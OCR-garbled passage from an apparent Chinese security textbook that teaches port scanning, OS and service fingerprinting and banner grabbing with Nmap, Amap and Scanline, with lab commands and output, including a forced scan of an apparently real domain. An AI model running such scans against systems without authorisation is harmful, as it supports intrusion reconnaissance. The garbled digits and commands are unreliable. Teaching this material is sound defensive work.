务 的 区 域 , 即 不 同 通信 网 用 户 无 须知 道 移 动 台 的 实际 位 置 ,而 可 与 之 通信 的 区 域 。 

@ 执行 下 列 命令 退出 Scapy, 也 可 以 按 Ctrl 十 D 组 合 键 退 出 Scapy。 
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图 3-12 查看 TCP 路 由 跟踪 信息 


>>> exit() 


343 任务 3: 使 用 工具 进行 系统 指纹 识别 和 服务 指纹 识别 





任务 目标 





使 用 工具 测试 正在 运行 的 目标 主机 的 操作 系统 以 及 服务 的 指纹 信息 ,包括 服务 端口 、 


服务 器 名 和 版 本 等 。 
2. 工作 任务 


(1) 使 用 Nmap 工具 识别 系统 指纹 信息 。 
(2) 使 用 Nmap 工具 识别 服务 指纹 信息 。 
(3) 使 用 Amap 工具 识别 服务 指纹 信息 。 


3. 工作 环境 
台 预 装 Kali Linux 系统 的 主机 。 
4. 实施 过 程 


(1) 使 用 Nmap 工具 识别 系统 指纹 信息 。 

@ 使 用 nmap 命令 的 -O 选项 启用 操作 系统 测试 功能 ,如 图 3-13 所 示 。 

@ 输出 的 信息 显示 了 主机 192. 168. 232. 129 的 指纹 信息 ,包括 目标 主机 打开 的 端 
口 .MAC 地 址 ,操作 系统 类 型 和 内 核 版 本 等 

(2) 使 用 Nmap 工具 识别 服务 指纹 信息 。 

@ 使 用 nmap 命令 的 -sV 选项 查看 192. 168. 232. 129 服务 器 上 正在 运行 的 端口 ,如 
图 3-14 所 示 。 
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:~# nmap -0 192.168.232.129 


Starting Nmap 7.25BETAT ( https://nmap.org ) at 2617-64-15 15:18 CST 
Nmap scan report for 192.168.232.129 

Host is up (0.00062s Latency). 

Not shown: 998 filtered ports 

PORT STATE SERVICE 

21/tcp open ftp 

86/tcp open http 

IMAC Address: 80:06C:29:B9:05:58 (VMware) 

Warning: OSScan results may be unreliable because we could not find at least 1 0 
pen and 1 closed port 

Device type: general purpose 

Running: Microsoft Windows 2612 

05 CPE: cpe:/o:microsoft:windows server 2012:r2 

05 details: Microsoft Windows Server 2612 or Windows Server 2612 R2 
Network Distance: 1 hop 


05 detection performed. Please report any incorrect results at https://nmap.org/ 
submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 21.12 seconds 





图 3-13 启用 操作 系统 测试 功能 


root@kali:~# nmap ~sV 192.168.232.129 


Starting Nmap 7.25BETAL ( https://nmap.org ) at 2617-64-15 15:23 CST 
Nmap scan report for 192.168.232.129 

Host is up (6.969649s Latency) . 

Not shown: 998 fittered ports 

PORT STATE SERVICE VERSION 

21/tcp open ftp Microsoft ftpd 

86/tcp open http Microsoft HTTPAPI httpd 2.6 (SSDP/UPnP) 

MAC Address: 66:6C:29:8B6:65:58 (VMware) 

Service Info: 05: Windows; CPE: cpe:/o:microsoft:windows 


Service detection performed. Please report any incorrect results at https://nmap 
.0rg/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds 





图 3-14 查看 服务 器 上 正在 运行 的 端口 


@ 输出 的 信息 显示 了 目标 服务 器 192. 168. 
时 还 获取 各 个 端口 对 应 的 服务 及 版 本 信息 

(3) 使 用 Amap 工具 识别 服务 指纹 信息 

@ 使 用 Amap 工具 在 指定 的 50 一 100 端口 范围 内 测试 目标 主机 192. 168. 
上 正在 运行 的 应 用 程序 ,如 15 所 示 





了 的 端口 号 有 21 和 80, 同 












t@kali:~# ET 
amap V5.4 (www.thc.org/thc-amap) started at 2017-84-15 15:29:26 - APPLICATION MAPPING 
mode 


Protocol on 192.168.232.129:86/tcp matches http - banner: HTTP/1.1 464 Not Found\r\nC 
ontent-Type text/htmL; charset=us-ascii\r\vnServer Microsoft-HTTPAPI/V2.6\r\vnDate Sun， 


16 Apr 2617 981865 GMT\r\nConnection cLose\r\nContent-Length 315\r\n\r\n<!DOCTYPE HTM 
[0 

Protocol on 192.168.232.129:86/tcp matches http-apache-2 - banner: HTTP/1.1 .464 Not F 
ound\r\nContent-Type text/html; charset=Us-ascii\r\nS5erver Microsoft-HTTPAPI/2.0\r\nD 
ate Sun, 16 Apr 2617 881885 GMT\r\nConnection close\r\nContent-Length 315\r\n\r\n<!D0 
CTYPE HTML PUBEIC "-//W3C//DTD HTME 4.01//EN""http//www.w3.org/TR/ 





图 3-15 在 指定 的 端口 范围 内 测试 目标 主机 上 正在 运行 的 应 用 程序 
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@ 输出 的 信息 显示 了 目标 主机 192. 168. 232. 129 在 50 一 100 端口 范围 内 正在 运行 
的 端口 ,从 输出 结果 的 第 二 段 内 容 中 可 以 了 解 到 主机 192. 168. 232. 129 使 用 时 的 
Windows Server 操作 系统 。 





3.5 常见 问题 解答 


为 什么 要 测试 网 络 范围 ? 
答 : 测试 网 络 范围 内 的 IP 地 址 或 域名 是 网 络 攻击 的 重要 组 成 部 分 ,通过 查询 目标 网 
络 中 IP 地 址 或 域名 信息 ,扫描 网 络 即 嗅 探 数 据 包 , 可 以 确定 是 否 有 黑客 人 侵 自 己 的 网 络 


并 损害 系统 。 
3.6 认证 试题 
简 答题 


1. 简 述 什么 是 枚 举 服务 。 
2. 简 述 什么 是 系统 指纹 信息 和 服务 指纹 信息 。 


4.1 用 户 需求 与 分 析 


收集 目标 主机 信息 的 方法 有 两 种 : 使 用 各 种 扫描 工具 对 目标 主机 进行 大 规模 的 扫 
描 ,得 到 系统 信息 和 运行 的 服务 信息 ; @ 利 用 各 种 查询 手段 得 到 与 目标 主机 相关 的 一 切 
信息 。 扫 描 技 术 是 收集 信息 的 技术 手段 ,是 攻击 者 入 侵 被 攻击 者 之 前 的 “踩点 ”, 网 络 扫描 
可 以 分 为 两 大 类 : 端口 扫描 类 和 漏洞 扫描 类 。 端 口 扫 描 的 功能 是 探测 主机 是 否 在 线 , 获 
得 主机 开放 的 端口 、 运 行 的 服务 、 使 用 的 操作 系统 和 软件 等 信息 ; 漏洞 扫描 主要 扫描 主机 
开放 的 端口 运行 的 服务 、 使 用 的 操作 系统 和 应 用 软件 有 何 漏洞 。 黑 客 通过 对 目标 主机 进 
行 扫描 发 现 漏洞 和 弱点 ,甚至 能 探测 出 目标 主机 用 户 账号 和 密码 等 信息 ,然后 使 用 病毒 和 
木马 对 这 些 漏洞 进行 攻击 甚至 破坏 计算 机 系统 。 


4.2 预备 知识 


421 漏洞 概述 


由 于 大 部 分 严重 的 网 络 安全 威胁 都 是 由 信息 系统 所 存在 的 安全 漏洞 诱发 的 ,所 以 及 
时 发 现 和 处 理 漏 洞 是 安全 防范 工作 的 重 中 之 重 。2016 年 ,国家 信息 安全 漏洞 共享 平台 
(CNVD) 共 收录 通用 软 硬 件 漏洞 10822 个 。 其 中 ,高危 漏 洞 4146 个 ( 占 38. 3%)、 中 危 漏 
洞 5993 个 ( 占 55.4%)、 低 危 漏洞 683 个 ( 占 6. 3%)。 在 所 收录 的 上 述 漏 洞 中 ,可 用 于 实 
施 远程 网 络 攻 击 的 漏洞 有 9503 个 ,可 用 于 实施 本 地 攻击 的 漏洞 有 1319 个 ,“ 零 日 ”漏洞 有 
2203 个 。2016 年 ,CNVD 共 收 集 .整理 了 4146 个 高 危 漏 洞 ,涵盖 Google、Oracle、Adobe、 
Microsoft、IBM、Apple、Cisco、Wordpress、Mozilla、Huawei 等 厂商 的 产品 及 Linux。 各 厂 
商 产 品 中 高 危 漏 洞 的 分 布 情况 如 图 4-1 所 示 。 

根据 影响 对 象 的 类 型 ,漏洞 可 分 为 : 操作 系统 漏洞 .应 用 程序 漏洞 .Web 应 用 漏洞 . 数 
据 库 漏洞 .网 络 设备 漏洞 (如 路 由 器 .交换 机 等 ) 和 安全 产品 漏洞 (如 防火 墙 \ 人 侵 检测 系统 
等 )。 如 图 4-2 所 示 , 在 CNVD 2016 年 度 收集 .整理 的 漏洞 信息 中 ,操作 系统 漏洞 占 








[ug > mg 安全 (第 版 )] 





Huawei Mozilla 2% 
3% 2% 


图 4-1 2016 年 CNVD 收录 高 危 漏洞 分 布 


13%, 应 用 程序 漏洞 占 60% ,Web 应 用 漏洞 占 17% ,数据 库 漏洞 占 2% ,网 络 设备 漏洞 占 
6% ,安全 产品 漏洞 占 2%。 






数据 库 漏洞 安全 产品 漏洞 网 络 设备 漏洞 

2% 2% 6% 

应 用 程序 漏洞 Web 应 用 漏洞 
60% 17% 








操作 系统 漏洞 
13% 


图 4-2 2016 年 CNVD 收录 漏洞 按 影响 对 象 类 型 分 类 统计 图 


2016 年 ,CNVD 共 收 录 漏 洞 补丁 8619 个 ,并 为 大 部 分 漏洞 提供 了 可 参考 的 解决 方 
案 ,提醒 相关 用 户 注意 做 好 系统 加 固 和 安全 防范 工作 。 


422 主要 端口 及 漏洞 介绍 
1. 135 端口 及 其 漏洞 


135 端口 主要 用 于 使 用 RPC(Remote Procedure Call ,远程 过 程 调用 ) 协 议 并 提供 
DCOM( 分 布 式 组 件 对 象 模型 ) 服 务 ,通过 RPC 可 以 保证 在 一 台 计 算 机 上 运行 的 程序 可 以 
顺利 执行 远程 计算 机 上 的 代码 ,使 用 DCOM 可 以 通过 网 络 直 接 进行 通信 ,能 够 进行 跨 协 
议 的 多 种 网 络 传 输 。 鼎 鼎 大 名 的 “冲击 波 ” 病 毒 就 是 利用 RPC 漏洞 来 攻击 计算 机 的 。 
RPC 本 身 在 处 理 通过 TCP/IP 的 消息 交换 部 分 时 有 一 个 漏洞 ,该 漏洞 是 由 于 错误 地 处 理 
格式 不 对 的 消息 造成 的 。 该 漏洞 会 影响 到 RPC 与 DCOM 之 间 的 一 个 接口 ,该 接口 侦 听 
的 端口 就 是 135 。 
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2. 139 端口 及 其 漏洞 


139 端口 是 为 NetBIOS Session Service 提供 的 ,主要 用 于 提供 Windows 文件 和 打印 
机 共享 以 及 UNIX 中 的 Samba 服务 。 在 Windows 中 要 在 局 域 网 中 进行 文件 的 共享 , 必 
须 使 用 该 服务 。 开 启 139 端口 虽然 可 以 提供 共享 服务 ,但 是 常常 被 攻击 者 所 利用 进行 国 
内 国际 ,比如 使 用 流光 .Super Scan 和 X-Scan 等 端口 扫描 软件 ,可 以 扫描 目标 主机 的 139 
端口 。 如 果 发 现 有 漏洞 ,可 以 试图 获取 用 户 名 和 密码 。 因 此 ,如 果 不 需 要 提供 文件 和 打印 
机 共享 ,建议 关闭 该 端口 。 


3. 3389 端口 


3389 端口 是 Windows 操作 系统 远程 桌面 的 服务 端口 ,可 以 通过 这 个 端口 ,用 “远程 
桌面 "等 连接 工具 连接 到 远程 的 服务 器 。 如 果 连 接 上 了 ,输入 系统 管理 员 的 用 户 名 和 密码 
后 ,将 可 以 像 操作 本 机 一 样 操作 远程 的 服务 器 ,因此 远程 服务 器 一 般 都 将 这 个 端口 改变 数 
值 或 者 关闭 。 


4 2 3 扫描 器 的 作用 及 工作 原理 


一 个 端口 就 是 一 个 潜在 的 通信 通道 ,也 就 是 一 个 人 侵 通 道 。 对 目标 计算 机 端口 进行 
端口 扫描 能 够 得 到 许多 有 用 的 信息 。 进 行 扫描 的 方法 有 很 多 ,可 以 用 手工 进行 扫描 ,也 可 
以 用 端口 扫描 软件 进行 扫描 。 用 手工 进行 扫描 时 需要 熟悉 各 种 命令 ,对 命令 执行 后 的 输 
出 进行 分 析 。 用 扫描 软件 进行 扫描 时 ,许多 扫描 器 软件 都 有 分 析 数 据 的 能 力 ,通过 端口 扫 
描 可 以 得 到 许多 有 用 的 信息 ,从 而 发 现 系统 的 安全 漏洞 。 

扫描 器 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ,通过 使 用 扫描 器 可 以 不 
留 痕迹 地 发 现 远 程 服务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 以 及 它们 的 软件 版 本 ,从 
而 间接 或 直接 地 了 解 到 远程 主机 所 存在 的 安全 问题 。 

黑客 在 探测 目标 计算 机 都 开放 了 哪些 端口 .提供 了 哪些 服务 之 前 ,首先 要 与 目标 计算 
机 建立 TCP 连接 ,这 就 是 扫描 的 出 发 点 。 扫 描 器 向 目标 计算 机 的 TCP/IP 服务 端口 发 送 
探测 数据 包 , 并 记录 目标 主机 的 响应 。 通 过 分 析 响 应 来 判断 服务 端口 是 打开 还 是 关闭 ,就 
可 以 得 知 端口 提供 的 服务 或 信息 。 端 口 扫描 也 可 以 通过 捕获 本 地 计算 机 或 服务 器 的 流 
入 流出 IP 数据 包 来 监视 本 地 计算 机 的 运行 情况 , 它 仅 能 对 接收 到 的 数据 进行 分 析 , 帮 助 
用 户 发 现 目标 计算 机 的 某 些 内 在 弱点 ,而 不 会 提供 进入 一 个 系统 的 详细 步骤 。 


424 常用 端口 扫描 技术 分 类 


通常 网 络 扫描 是 基于 TCP/IP 实现 的 ,如 ICMP 扫描 ,TCP 扫描 和 UDP 扫描。 整个 
扫描 流程 如 下 。 

第 一 步 , 主 机 存活 性 扫描 : 是 指 评 估 主 机 的 存活 状态 , 即 是 否 在 线 。 但 是 被 扫描 主机 
可 能 使 用 防火 墙 阻塞 ICMP 数据 包 , 可 能 会 逃 过 存活 性 扫描 的 判定 。 

第 二 步 , 端 口 扫描 : 针对 主机 判断 端口 开放 和 关闭 情况 ,是 存活 性 扫描 的 有 益 补充 。 

第 三 步 , 服 务 识别 : 判断 主机 提供 的 服务 。 
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第 四 步 , 操 作 系 统 识别 : 判断 主机 运行 操作 系统 的 类 型 及 其 版 本 。 
1. 主机 存活 性 扫描 


主机 存活 性 扫描 的 目的 是 确定 在 网 络 上 的 目标 主机 是 否 可 达 , 这 是 信息 收集 的 初级 
阶段 。 使 用 ping 命令 利用 ICMP 的 echo 发 出 请 求 , 如 果 收 到 回应 就 表示 主机 存活 。 
常用 的 扫描 技术 有 如 下 几 种 。 

(1) ICMP echo 扫描 : 有 时 通过 ping 命令 判断 一 个 网 络 上 的 主机 是 否 开机 时 非常 有 
。ping 是 最 简单 的 探测 手段 ,用 来 判断 目标 是 否 活 动 。 而 且 ping 命令 一 般 在 系统 内 核 
中 实现 ,而 不 是 一 个 用 户 进 程 ,因此 更 加 不 容易 被 发 现 。 精 度 相对 较 高 ,通过 简单 地 向 目 
标 主 机 发 送 ICMP echo request 数据 包 , 并 等 待 回复 ICMP echo reply 包 。 

(2) ICMP sweep 扫描 : 使 用 ICMP echo request 一 次 探测 多 个 目标 主机 ,进行 并 发 
性 扫描 ,提高 了 探测 效率 ,适用 于 大 范围 的 评估 。 

(3) Broadcast ICMP 扫描 (广播 型 ICMP 扫描 ): 通过 设置 ICMP 请 求 包 的 目标 地 址 
为 广播 地 址 或 网 络 地 址 ,可 以 探测 整个 网 络 范围 内 的 主机 , 子 网 内 所 有 存活 主机 都 会 进行 
响应 ,只 适用 于 UNIX 或 Linux 系统 。 

(4) No-Echo ICMP 扫描 : 既 能 探测 主机 ,又 能 探测 网 络 设备 ,利用 了 timestamp 和 
timestamp replay 、information request 和 information reply、address mask request 和 
address mask reply 功能 。 

















下 


2. 端口 扫描 


在 完成 主机 存活 性 判断 之 后 ,接着 判断 主机 开放 端口 的 状态 , 即 主机 上 开放 的 服务 。 
TCP 端口 扫描 技术 利用 三 次 握手 过 程 与 目标 主机 建立 完整 或 不 完整 的 TCP 连接 。 

常用 的 技术 有 如 下 几 种 。 

(1) TCP connect Scan(TCP 连接 扫描 ): 它 是 最 基本 的 TCP 扫描 ,直接 连 到 目标 端 
口 并 完成 一 个 完整 的 三 次 握手 过 程 (SYN、SYN/ACK 和 ACK)。 操 作 系统 提供 的 
connect() 函 数 完成 系统 调用 ,用 来 与 目标 计算 机 端口 进行 连接 。 如 果 端 口 处 于 侦 听 状 
态 ,那么 connect() 函 数 就 能 成 功 ,否则 这 个 端口 是 无 法 使 用 的 ,也 就 是 没有 提供 服务 。 这 
种 扫描 技术 的 最 大 优点 是 不 需要 任何 权限 ,系统 中 的 任何 用 户 都 有 权利 使 用 这 个 调用 。 
其 次 是 速度 快 ,通过 同时 打开 多 个 套 接 字 从 而 加 速 扫描 。 缺 点 是 很 容易 被 发 觉 ,并 且 被 过 
滤 掉 。 目 标 计 算 机 的 日 志文 件 会 显示 一 连 串 的 连接 和 连接 出 错 的 服务 消息 ,并 且 能 很 快 
地 使 它 关 闭 。 

(2) TCP SYN Scan(TCP 同步 序列 号 扫描 ): 它 是 一 种 “ 半 开 放 ” 式 扫描 ,因为 扫描 程 
序 不 必 完 成 一 个 完整 的 TCP 连接, 即 扫描 主机 和 目标 主机 一 指定 端口 建立 连接 时 ,只 完 
成 前 两 次 握手 ,在 第 三 步 时 ,扫描 主机 中 断 了 本 次 连接 ,使 连接 没有 完全 建立 起 来 。 扫 描 
程序 发 送 的 是 一 个 SYN 数据 包 , 好 像 准 备 打开 一 个 实际 的 连接 并 等 待 反应 一 样 。 这 种 
扫描 技术 的 优点 是 一 般 不 会 在 目标 计算 机 上 留 下 记录 ; 缺点 是 必须 要 有 系统 管理 员 权 
限 , 不 适合 使 用 多 线程 技术 。 

(3) TCP FIN Scan(TCP 结束 标志 扫描 ): 一 些 防火 墙 和 包 过 滤器 会 对 一 些 特定 的 
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端口 进行 监视 ,有 的 程序 能 检测 到 SYN 扫描 。 而 FIN 数据 包 则 没有 这 些 麻烦 。TCP 
FIN 扫描 的 是 关闭 的 端口 会 用 RST 来 回复 FIN 数据 包 , 而 打开 的 端口 会 忽略 对 FIN 数 
据 包 的 回复 。 但 有 些 系 统 不 管 端口 打开 与 否 都 回复 RST, 此 时 这 种 扫描 方法 则 失效 。 并 
且 这 种 方法 在 区 分 UNIX 和 Windows NT 时 是 十 分 有 用 的 。 


3. 服务 及 系统 指纹 识别 


在 判断 完 端 口 情况 后 ,需要 判断 服务 和 操作 系统 类 型 ,主要 有 以 下 技术 。 

(1) 根据 端口 判定 : 直接 利用 端口 与 服务 的 对 应 关系 ,例如 23 端口 对 应 Telnet 服 
务 ,21 端口 对 应 FTP 服务 ,80 端口 对 应 HTTP 服务 。 

(2) 根据 旗 标 (Banner) 判 定 : 通过 获取 服务 的 Banner 来 判定 当前 运行 的 服务 情况 ， 
不 仅 能 判定 服务 ,还 能 判定 具体 服务 版 本 信息 ,例如 HTTP、FTP 和 Telnet 都 能 够 获取 
Banner 信息 。 

(3) 指纹 技术 : 利用 不 同 操作 系统 在 TCP/IP 协议 栈 实现 上 的 差别 来 识别 一 个 操作 
系统 的 类 型 。 例 如 根据 ICMP reply 包 的 TOS、TTL 值 , 校 验 和 等 信息 ,通过 这 些 信息 以 
树 状 形式 去 查找 ,最 终 精 确 锁定 对 方 的 操作 系统 。 


4. 其 他 扫描 技术 


IP Scan(IP 协议 扫描 ): 它 不 直接 发 送 TCP 协议 探测 数据 包 , 而 是 将 数据 包 分 成 两 
个 较 小 的 IP 协议 段 ,这 样 就 将 一 个 TCP 协议 头 分 成 几 个 数据 包 , 从 而 过 滤器 很 难 探 测 
到 。 但 有 些 程序 在 处 理 这 些小 数据 包 时 会 有 些 麻烦 。 


5. UDP Scan(UDP 协议 扫描 ) 


在 UDP 目标 端口 发 送 一 个 UDP 分 组 。 如 果 目 标 端口 以 ICMP port Unreachable 
(ICMP 端口 不 可 达 ) 消 息 作为 响应 , 则 该 端口 是 关闭 的 ,否则 就 是 打开 的 。 由 于 UDP 是 
无 连接 的 不 可 靠 协议 ,因此 这 种 方法 的 准确 性 很 大 程度 上 取决 于 与 网 络 及 系统 资源 使 用 
率 相关 的 多 个 因素 。 当 试图 扫描 一 个 大 量 应 用 分 组 过 滤 功 能 的 设备 时 ,UDP 扫描 将 是 一 
个 非常 缓慢 的 过 程 。 如 果 在 互联 网 上 执行 UDP 扫描 ,那么 结果 就 是 不 可 靠 的 。 


425 常用 扫描 器 介绍 
1. 扫描 工具 Scanline 简介 


Scanline 是 著名 的 Foundstone 公司 的 产品 ,国外 黑客 比较 常用 的 端口 扫描 器 ,工作 
在 命令 行 下 ,扫描 的 速度 非常 快 。 使 用 方法 为 : C:\sl -u 1-600 192. 168. 1. 2, 扫 描 IP 地 
址 为 192. 168. 1. 2 主机 的 1 一 600 的 UDP 端口 。 


2. 漏洞 扫描 工具 Nessus 简介 


Nessus 是 系统 漏洞 扫描 与 分 析 软 件 , 可 以 在 Windows 上 运行 也 可 以 在 Linux 上 运 
行 ,拥有 庞大 的 漏洞 数据 库 , 采 用 浏览 器 /服务 器 架构 ,客户 端 提供 图 形 界面 接受 用 户 的 扫 
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描 请 求 ,由 服务 器 启动 扫描 并 将 扫描 结果 发 送 给 客户 端 。Nessus 具有 扫描 任意 端口 、 任 
意 服务 的 能 力 ,输出 报告 格式 多 样 、 内 容 详细 ,包括 目标 主机 的 漏洞 .防止 黑客 人 侵 的 方法 
及 危险 级 别 , 非 常 适合 作为 网 络 安全 的 评估 工具 。 


4.3 方案 设计 


方案 设计 如 表 4-1 所 示 。 
表 4-1 方案 设计 





任务 名 称 漏洞 扫描 


1. 扫描 工具 Scanline 的 使 用 

(1) 主机 存活 扫描 

(2) 使 用 内 置 端口 扫描 主机 开放 端口 

(3) 使 用 自 定义 端口 扫描 主机 开放 端口 

(4) 扫描 耳 段 

(5) 强制 扫描 

(6) 获取 Banner 信息 

(7) 从 文件 中 导入 端口 和 IP 地 址 ,并 把 结果 输出 到 文件 
2. 扫描 工具 Nmap 的 使 用 

(1) 主机 存活 扫描 

(2) 内 置 端口 扫描 

任务 分 解 (3) 详细 扫描 信息 分 析 

(4) 指定 端口 和 IP 进行 扫描 

(5) 获得 操作 系统 类 型 

(6) 强制 扫描 

3. 利用 Kali Linux 操作 系统 进行 Nmap 扫描 
(1) Kali Linux 下 的 nmap 软件 包 的 安装 

(2) 识别 活跃 的 主机 

(3) 查看 开放 的 端口 

(4) 查看 网 站 的 操作 系统 类 型 

(5) 查看 主机 开放 的 端口 号 和 操作 系统 类 型 
(6) 扫描 整个 网 段 主机 的 开放 端口 状态 

(7) 图 形 化 TCP 端口 扫描 工具 Zenmap 的 使 用 
. 能 使 用 Scanline 检测 主机 是 否 存活 

. 能 使 用 Scanline 检测 目标 主机 端口 开放 情况 
. 能 使 用 Scanline 利用 自 定义 端口 扫描 主机 

. 能 使 用 Scanline 获取 Banner 信息 

.能 使 用 Scanline 从 文件 中 导入 端口 和 IP 地 址 ,并 把 结果 输出 到 文件 
. 能 使 用 Nmap 检测 主机 是 否 存 活 

. 能 使 用 Nmap 检测 目标 主机 端口 开放 情况 
.能 使 用 Nmap 利用 自 定义 端口 扫描 主机 

. 能 在 Kali Linux 操作 系统 上 进行 Nmap 扫描 








能 力 目标 





-i 
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续 表 





. 了 解 漏洞 的 分 类 

. 熟悉 扫描 器 的 作用 

. 了 解 扫描 器 的 工作 原理 

. 了解 常 用 端口 扫描 技术 分 类 
.了 解 常用 的 网 络 探测 方法 

. 了解 常 用 扫描 器 的 功能 及 优 缺 点 
. 掌握 网 络 安全 行业 的 基本 情况 
.培养 良好 的 职业 道德 

. 具有 良好 的 团队 协作 和 沟通 交流 能 力 
.培养 创新 能 力 

. 树立 较 强 的 安全 \ 节 约 \ 环 保 意识 


知识 目标 





素质 目标 





moam own 





4.4 项 目 实 施 


441 任务 1: 扫描 工具 Scanline 的 使 用 
1. 任务 目标 


使 用 Scanline 进行 端口 扫描 ,检测 主机 是 否 存活 ,检测 目标 主机 端口 开放 情况 、 获 得 
Banner 信息 ,从 文件 中 导入 端口 和 IP 地 址 ,并 把 结果 同时 输出 到 文件 中 。 


2. 工作 任务 


(1) 主机 存活 扫描 。 

(2) 使 用 内 置 端口 扫描 主机 开放 端口 。 

(3) 使 用 自 定义 端口 扫描 主机 开放 端口 。 

(4) 扫描 IP 段 。 

(5) 强制 扫描 。 

(6) 获取 Banner 信息 。 

(7) 从 文件 中 导入 端口 和 IP 地 址 ,并 把 结果 输出 到 文件 。 


3. 工作 环境 


(1) 预 装 Windows 7 系统 的 主机 。 
(2) 软件 工具 : Scanline。 


4. 实施 过 程 
(1) 主机 存活 扫描 ,不 进行 端口 扫描 。 


C:\scanline> sl -mn 192.168.5.1 





[网络 安全 部 署 ( 第 e 版 ) | 








参数 -n 表示 不 进行 端口 扫描 ,只 Ping 主机 ,具体 操作 如 图 4-3 所 示 ,扫描 结果 表明 扫 
描 到 一 个 存活 主机 。 


:vscanlineysl1 -nm 192-168-5-1 
BcanLine CIM> 1. 虹 1 

opyright 《c》 Foundstone。 Inc. 2882 
http://wu.foundstone .con 


Bcan of 1 IP started at Wed Mar 29 B89:31:38 2817 
h92.168.5.1 
Responded in B ms- 


四 hops avay 
IResponds with ICHP unreachable: No 


Bcan finished at Wed Mar 29 89:31:38 2817 


hh IP and 8 ports scanned in 8 hours B mins B.BB secs | 
LB 





图 4-3 扫描 主机 是 否 存活 
(2) 使 用 内 置 端口 扫描 主机 开放 端口 。 
C:\ scanline> sl -T -U192.168.5.1 


使 用 参数 -T 是 使 用 工具 内 置 的 TCP 端口 列表 ; 使 用 参数 -U 是 使 用 工具 内 置 的 
UDP 端口 列表 , 均 不 用 指定 ,如 图 4-4 所 示 。 












-192.168.5.1 






opyright 《c》 Foundstone- 
jhetp:vAwww-foundstone-com 


Inc。2992 





Bcan of 1 IP started at Wed Mar 29 09:36:87 2917 


IResponds with ICHP unreachable: Yes 
CP ports: 135 139 445 2869 
DP ports: 123 137 138 599 1999 


Rcan finished at Wed Mar 29 99:36:17 2817 






hh IP and 267 ports scanned in 8 hours 8 nins 19.34 secs 加 | 
园 


图 4-4 使 用 内 置 端口 扫描 主机 开放 端口 
(3) 使 用 自 定义 端口 扫描 主机 开放 端口 。 
C:\scanline> sl -t+ 100—200 —u 500— 1000 192.168.5.1 


参数 -t 表示 指定 扫描 的 TCP 端口 ; 参数 -u 表示 指定 扫描 的 UDP 端口 ,端口 号 可 以 
指明 范围 ,如 图 4-5 所 示 , 如 100 一 200.500 一 1000。 
(4) 扫描 IP 地 址 范围 。 


C:\scanline> sl -h 192.168.5.1-10 


:sscanlineys1 -t 198-288 —u 588-1888 192.168.5.1 
BcanLine CIM> 1.81 

opyright 《c》 Foundstone。 Inc- 2882 
ttp://wwu.foundstone -com 


Responds with ICHP unreachable: Yes 
CP ports: 135 139 
DP ports: 599 


Bcan finished at Wed Mar 29 89:48:89 2817 


hh IP and 692 ports scanned in B hours 8 nins 12.66 secs 
* 








图 4-5 使 用 自 定义 端口 扫描 主机 开放 端口 


扫描 指定 的 IP 地 址 范围 ,例如 ,扫描 192. 168. 5. 1 一 192. 168. 5. 10 网 段 ,参数 -h 表示 
隐藏 端口 没有 开放 的 计算 机 。 

(5) 强制 扫描 。 

C:\scanline> sl —p www. sdpt.com.cn 

如 果 一 台 开 放 端 口 的 目标 主机 因为 安装 了 防火 墙 而 无 法 Ping 通 ,可 以 执行 强制 扫 
描 。 使 用 参数 -p 表示 扫描 前 不 要 Ping 主机 , 跳 过 存活 性 扫描 ,直接 进行 端口 扫描 。 如 果 
不 使 用 参数 -p, 若 Ping 不 通 目标 主机 , 则 不 再 进行 该 目标 主机 的 端口 扫描 。 

(6) 获得 Banner 信息 。 

C:\scanline> sl —p —b www. sdpt.com.cn 

参数 -b 表示 获取 端口 的 Banner 信息 , 即 旗 标 。 例 如 ,车 返回 的 Banner 信息 是 Server 
Microsoft -TIS/7. 5, 表 明 该 Web 服务 器 安装 在 Windows 系统 中 ,并 且 IIS 的 版 本 号 是 7. 5， 
由 此 推断 服务 器 应 该 是 Windows Server 2008 以 上 的 版 本 。 

(7) 从 文件 中 导入 端口 和 IP 地 址 ,并 把 结果 输出 到 文件 。 

C:\scanline> sl -h -1 tcp- port.txt -fip .txt ~ o output. txt 

端口 号 在 tcp-port. txt 文件 中 ,主机 的 IP 地 址 在 ip. txt 文件 中 ,结果 输出 到 output 
.txt 文件 中 。 参 数 -1 表示 从 文件 中 读 取 待 检测 TCP 端口 列表 ,若是 参数 -L 则 表示 从 文 
件 中 读 取 待 检测 UDP 端口 列表 ; 参数 -f 表示 从 文件 中 读 取 待 检测 的 IP 地 址 ; 参数 -o 表 
示 采 用 覆盖 模式 将 结果 保存 到 文件 中 。 


442 任务 2: 扫描 工具 Nmep 的 使 用 
1. 任务 目标 
使 用 Nmap 进行 端口 扫描 、 检 测 主机 是 否 存活 、 检 测 目标 主机 端口 开放 情况 、 获 得 
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Banner 信息 、 从 文件 中 导入 端口 和 IP 地 址 ,并 把 结果 同时 输出 到 文件 中 。 
2. 工作 任务 


(1) 主机 存活 扫描 。 

(2) 内 置 端口 扫描 。 

(3) 详细 扫描 信息 分 析 。 

(4) 指定 端口 和 IP 进行 扫描 。 
(5) 获得 操作 系统 类 型 。 

(6) 强制 扫描 。 


3. 工作 环境 


(1) 预 装 Windows 7 系统 的 主机 。 
(2) 软件 工具 : Nmap。 


4. 实施 过 程 
(1) 主机 存活 扫描 ,不 进行 端口 扫描 。 


C:\>nmap — sP 192.168.5.1 


Host is up 表明 该 主机 是 开机 的 ,如 图 4-6 所 示 。 





:Nonmap -sP 192.168.5.1 习 


Starting Nnap 6.47 < http://nnap.org 》at 2917-83-29 11:19 中 国标 准时 间 

ass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. 
Try using —systen-dns or specify valid servers with 一 dns-seruers 

Inap scan report for 192.168.5.1 

ost is up- 

map done: 1 IP address (1 host up》 scanned in 8.53 seconds 司 


图 4-6 扫描 主机 是 否 存活 


(2) 内 置 端口 扫描 。 
C:\ >nmap = Tr192.168.5.1 


参数 -sT 使 用 全 连接 扫描 , 即 TCP Connect 扫描 ,需要 花费 的 时 间 比 较 长 ,但 精确 度 
比较 高 ,如 图 4-7 所 示 。 
(3) 详细 扫描 信息 分 析 。 


C:\>nmap - sS - sV192.168.5.1 


参数 -sS 表示 使 用 TCP SYN 扫描 ; 参数 -sV 表示 版 本 探测 。 
(4) 指定 端口 和 IP 进行 扫描 。 


C:\>nmap -sT -sV -p100-500 192.168.5.1—100 


